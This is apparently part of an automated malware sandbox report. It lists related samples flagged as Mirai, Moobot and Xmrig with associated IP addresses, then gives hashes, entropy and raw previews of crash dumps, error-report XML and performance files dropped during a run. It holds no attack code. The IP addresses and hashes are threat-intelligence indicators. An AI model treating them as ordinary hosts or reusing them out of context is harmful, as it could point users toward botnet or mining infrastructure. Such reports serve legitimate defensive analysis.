                                                                                                                                                                                                                                              arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                              • 46.213.104.10
                                                                                                                                                                                                                                              newtpp.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                                                              • 82.137.239.235
                                                                                                                                                                                                                                              i586.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 90.153.236.174
                                                                                                                                                                                                                                              mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                              • 5.155.42.101
                                                                                                                                                                                                                                              loligang.mips-20241128-1536.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                              • 94.252.193.161
                                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):0.9164877006345423
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:h9KcFsCDcry/Osf9htff7gfN4QXIDcQvc6QcEVcw3cE/lpz+HbHg/EFAS/YyNl4H:nWO/Ob0BU/QjrJyzuiFHZ24IO8aB
                                                                                                                                                                                                                                              MD5:45B107AAE403E9DE4255CF0DDD5C6093
                                                                                                                                                                                                                                              SHA1:1B06562F97A32DE704ED08A6B76773A74CE06EE9
                                                                                                                                                                                                                                              SHA-256:AA004CF8326C7C6B5ECD5D1228219BF8409DAFA009B774339D9DB8638403A8F0
                                                                                                                                                                                                                                              SHA-512:AC753B4E74AFC1B800A764CC3EE6BB03EB5F4574E04A98B4AA4A9B106FEC27B26D0FC1A8D37AD462C247625F1B7899D1BCF47937F7152151894B2B827616E503
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.8.8.9.9.5.9.5.8.4.3.5.1.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.8.8.9.9.6.0.9.9.0.6.0.9.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.b.3.8.3.1.5.6.-.2.4.0.9.-.4.b.5.7.-.a.5.6.4.-.4.a.c.3.8.0.a.5.4.6.f.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.1.0.8.b.9.6.a.-.8.2.9.9.-.4.7.4.f.-.b.3.7.8.-.0.2.f.b.9.3.7.7.2.e.a.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.2.9.1.0.6.2.5.8.9.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.7.3.c.-.0.0.0.1.-.0.0.1.3.-.8.9.d.4.-.e.d.4.9.3.3.4.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.a.8.b.9.f.3.1.e.a.0.a.3.3.e.5.b.4.4.a.1.7.0.4.b.8.9.f.0.a.6.2.0.0.0.0.f.f.f.f.!.0.0.0.0.e.5.a.b.b.a.9.5.e.1.5.8.8.9.5.0.c.6.3.8.8.c.9.9.5.0.4.1.7.c.2.f.b.8.a.e.b.c.e.2.!.2.9.1.0.6.2.5.8.9.2...e.x.e.....T.a.r.g.e.t.A.p.p.
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):0.6601482262377685
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:O8KZFlB3ekAuqigKJns3Wrk41yHpHS2QXIDcQkc6tcEycw3ZUtzJzQ+HbHgrZ2Z4:sZJJHnnxR0apYKjqzuiFHZ24lO8JOC
                                                                                                                                                                                                                                              MD5:53BD5DA14E956B825D04FC704DC923BF
                                                                                                                                                                                                                                              SHA1:93062966AFF350C9BE19634C3677F26D603F67E1
                                                                                                                                                                                                                                              SHA-256:722EC5D4E1A1B0363F33539CD5D5DA1337B0E4A9735EB8443559CBD076CE420E
                                                                                                                                                                                                                                              SHA-512:73A6C68071CBDF2E05E2EE3AA0278D49B213DF6AD3C3C7A7296329373C09DA323E58E65CD858772CB26D3B36A9DBBBEBA7E6CFE2696FB9876E1B0CED957776C4
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.8.8.9.9.3.9.7.2.8.5.1.1.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.8.8.9.9.4.0.4.3.1.6.4.8.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.1.2.6.9.8.e.d.-.7.e.e.4.-.4.3.8.1.-.b.3.0.7.-.0.5.e.d.5.5.6.f.8.3.4.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.e.f.1.2.8.0.d.-.e.e.c.4.-.4.b.2.7.-.9.4.e.0.-.a.d.0.8.5.a.f.d.7.b.e.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.f.o.n.t.d.r.v.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.f.o.n.t.d.r.v.h.o.s.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.4.4.-.0.0.0.1.-.0.0.1.3.-.5.a.d.3.-.d.6.3.e.3.3.4.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.5.e.f.b.3.f.9.7.3.4.2.b.a.1.9.5.4.2.4.1.3.4.f.2.8.f.9.7.7.d.a.9.e.0.d.6.a.a.9.1.!.f.o.n.t.d.r.v.h.o.
                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                              File Type:Mini DuMP crash report, 14 streams, Thu Dec 5 16:32:40 2024, 0x1205a4 type
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):99920
                                                                                                                                                                                                                                              Entropy (8bit):1.758566581944912
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:q1hdovTLVktFxU4vQn6rfmg4+0FXT95x6w9/olw8ltuBYJsJ5UtN94qCYEgvC:e0vTLVktvri6IFD98lTk
                                                                                                                                                                                                                                              MD5:01AF201F0D2FFDF6450C466515E30DF6
                                                                                                                                                                                                                                              SHA1:238D192E5A8B17D34F2B6A2ECC938CAA2382D407
                                                                                                                                                                                                                                              SHA-256:991713F940FFB4A1E957DF229A8D05D9BBBD0348CA606C9BD01AE83F38163850
                                                                                                                                                                                                                                              SHA-512:12BE576445FEB72A6C8B4364843D03C2503CE569CE234AB7DB39EAAF23550F96DE2718DDD61145C45ABBD6B5DE542FF44393F94573ACB61633849DD4FB1BE53D
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MDMP..a..... .........Qg........................................nB..........T.......8...........T............3..`R......................................................................................................eJ......p.......GenuineIntel............T.......<.....Qg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):8292
                                                                                                                                                                                                                                              Entropy (8bit):3.697227958350287
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:R6l7wVeJnK6x6Y0o6SgmfJ1pr+89baHsfHS+m:R6lXJK6x6Yj6SgmfJ/aMfi
                                                                                                                                                                                                                                              MD5:30B09F82BBDF3B1BBA0E1D3CC7B97B35
                                                                                                                                                                                                                                              SHA1:DA585F281EA105B3DA33453769FF20F35D3D1497
                                                                                                                                                                                                                                              SHA-256:51F04FA67668FD90D52C91FE305C840AB9EE486E4F7DF84D0430B0E905639D51
                                                                                                                                                                                                                                              SHA-512:BF9C582D82CF5D4F51D9DB184BF71DE3F7DFA46B6894641A3CE0C98886F64C016B47CEF52F255CBFE3183B0E1FABFA11DE3284C6C3273E3DF5FA569B147A4FC4
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.8.5.2.<./.P.i.
                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):4583
                                                                                                                                                                                                                                              Entropy (8bit):4.449746188813983
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:cvIwWl8zsZlJg77aI9d2nWpW8VYjeYm8M4JcqFE+q8Q8zgEp+wbd:uIjf1I7/b7VCXJ66zgEswbd
                                                                                                                                                                                                                                              MD5:1194ACBE9B58924255F30ABCC1B7A991
                                                                                                                                                                                                                                              SHA1:4E5CD38CB3C1183AF2A0D3165DBC1F9955B02168
                                                                                                                                                                                                                                              SHA-256:1263402DD124010E523A5C448111C5451E3A61C6B32AD747D638B3A675F6E3EC
                                                                                                                                                                                                                                              SHA-512:4406BDE255BA05FF556FD1E94DE6CDD7BB9AC8922031E5274320A9C0ACC4C1E7B95F615EDCF89477340A708BD78558B03F049F934267B59F0B94C5A027C03BF4
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="618215" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):80044
                                                                                                                                                                                                                                              Entropy (8bit):3.0313448379117163
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:FMC5jVLF4WEzW0gEuxX7aazA+lNF3Ljx+D+IS+d+e+lvz+r+w+LA+O+4B2cMK+82:FMC5jVLF4WEzW0gEuxX7aazA+lNFbjx9
                                                                                                                                                                                                                                              MD5:98C9C926CA1D1962BF278E658F65415D
                                                                                                                                                                                                                                              SHA1:8B0B7B5658D0AB88DE50007672E82C45C3FEE579
                                                                                                                                                                                                                                              SHA-256:5B5DFB138CEC8AFDFDE680DE8A3AA38882D9C111FFC041F6F2B6AA021DFDCDB6
                                                                                                                                                                                                                                              SHA-512:9C4AF3894815B8170FE7D88739D8378D55C8D9906E2CB94EE4DE3F697010F2866D7757BD832201D6E72296DBDF9AAAB8242F09E04396A869FAA31E45F63DA1DB
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):13340
                                                                                                                                                                                                                                              Entropy (8bit):2.688744396195031
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:TiZYWPMFu12VrY8YJW+HgfUYEZuAUtSiOueEYwO5EAQaUcHM1GhI323:2ZDPYrb3NAN5QaUcHM1Ge323
                                                                                                                                                                                                                                              MD5:2466D16118CD4121DC792E4CCAFC724D
                                                                                                                                                                                                                                              SHA1:5DC5F3EEC7942D3A37A43D6668C8B0F6CF2CE48F
                                                                                                                                                                                                                                              SHA-256:3A20A46CF9CBADC8A3E578275106C48A2D830A19439DC7C84A0559E972AD4F0C
                                                                                                                                                                                                                                              SHA-512:00800A0485B990498602F5967F82EBD0F104C83706B5B221BCDAB4B5BE2A4F1202F6369D9EF87B7ABA586F655142359AC86F70DB50E07BE62629C239CD12BA20
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                              File Type:Mini DuMP crash report, 14 streams, Thu Dec 5 16:32:19 2024, 0x1205a4 type
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):46726
                                                                                                                                                                                                                                              Entropy (8bit):1.2869960149964732
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:5z8L1rB96R67kyp937i7EZAOYTujhP2FXTflDfWIWLNBIgOJol:2ZrB9j9rOEyOAgcFXTflITOY
                                                                                                                                                                                                                                              MD5:1D3CBAED885223E0AECBB48A49BCE260
                                                                                                                                                                                                                                              SHA1:0E9025B74072D3CFE19AF7EC61D9833F6662F146
                                                                                                                                                                                                                                              SHA-256:C1BAA29CC71A8863098988527FD33BFC7056A130A3325DFA9A2923D53325740D
                                                                                                                                                                                                                                              SHA-512:EA8764B2CA563927D92839FB108B315CD28F900B10CF6CE178863D9EFDB2EACA4DD413AD4765C1D34ADFDD7EF8EC9F447AAB330DF73D177E3C64235F888D5F0D
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MDMP..a..... .........Qg........................................2!..........T.......8...........T......................................................................................................................eJ..............Lw......................T.......D.....Qg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):8622
                                                                                                                                                                                                                                              Entropy (8bit):3.6920008518113203
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:R6l7wVeJTpSey6Y+dKDxgmfr57vypD189b+kKfvKm:R6lXJdm6YUKDxgmfrFvN+Zfj
                                                                                                                                                                                                                                              MD5:8F215A9C72499C2D33CC9816ECD61705
                                                                                                                                                                                                                                              SHA1:59D25A1A12B9E7D86E56E3191E00D11224BA2A3C
                                                                                                                                                                                                                                              SHA-256:2ECD921EC005582E697BED032930D5FE27F2389FA12E5E9EDD60206454EDA4B2
                                                                                                                                                                                                                                              SHA-512:FE361DA15E4F90D8056D7777B37A797648C0CB37A2E64EE293963EFFEF50EAFDCFCB8C0584DAD17658D22733AD15677B9139443D59115D48537B221EA8325C9F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.4.4.4.<./.P.i.
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):4853
                                                                                                                                                                                                                                              Entropy (8bit):4.44368745925604
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:cvIwWl8zsZlJg771I9d2nWpW8VYj0NYm8M4Jk5LvM6FBajyq8vU5LvMuaMuxFd:uIjf1I76b7VC0MJcjMTWsjMu1ubd
                                                                                                                                                                                                                                              MD5:7AF500A99F059DE48AA00FBF865E9D13
                                                                                                                                                                                                                                              SHA1:CAD4C05D8AB5FB6A53F2D9735473D18D3DB942F2
                                                                                                                                                                                                                                              SHA-256:A63FAFF8FF7A5C08B1C48E2D2110D045C1EF009FF06D3BC66596FD232E49D0E2
                                                                                                                                                                                                                                              SHA-512:271B5B39942C53B72FB2A968B57985E177A24A66DD598E9AFB5CAAC9FABC1F35D7888A0A8EA01E7B241E717E4AE8036AD3BACB6874C5E886008F1BB293020949
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="618215" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):78314
                                                                                                                                                                                                                                              Entropy (8bit):3.0323362411665475
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:q9WjSankzoZTXh7gxCQq/2tk+AiNbFEegbdJCQYYWdwyr0oSS5SZzy:q9WjSankzoZTXh7gxCQq/2tk+AiNbFEE
                                                                                                                                                                                                                                              MD5:67499E4FF56A455449FA8443E97FF53B
                                                                                                                                                                                                                                              SHA1:F7886224B0A7173751F8EF4E10FB56618A471D75
                                                                                                                                                                                                                                              SHA-256:DE323794823ED501A1AE98DADB3B82971507B2366F8E4BC033B5A781DCDEA5EB
                                                                                                                                                                                                                                              SHA-512:6EEFD5D73D696C97D668E0E5CA08732EE536CE08641C38C5976406EF0C76DBA6FAF608C326E6E8ED91A62147C9D309E8FE4CAD5C9EF8FBAF82439240EEF173D6
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
